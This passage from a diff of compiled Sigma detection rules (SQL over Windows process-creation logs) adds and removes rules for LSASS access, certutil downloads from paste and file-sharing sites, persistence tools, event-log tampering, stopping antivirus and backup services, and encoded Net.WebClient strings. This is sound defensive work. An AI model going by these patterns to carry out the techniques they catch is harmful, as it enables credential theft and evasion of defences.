"proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "Port 
Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of Sysinternals 
ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR 
CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" - }, - { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by 
having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND 
((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" ], "level": 
"high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" - }, - { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", - "status": "experimental", - "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1489" - ], - "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! 
Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE 
'%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE 
'%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL 
Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR 
CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' 
ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE 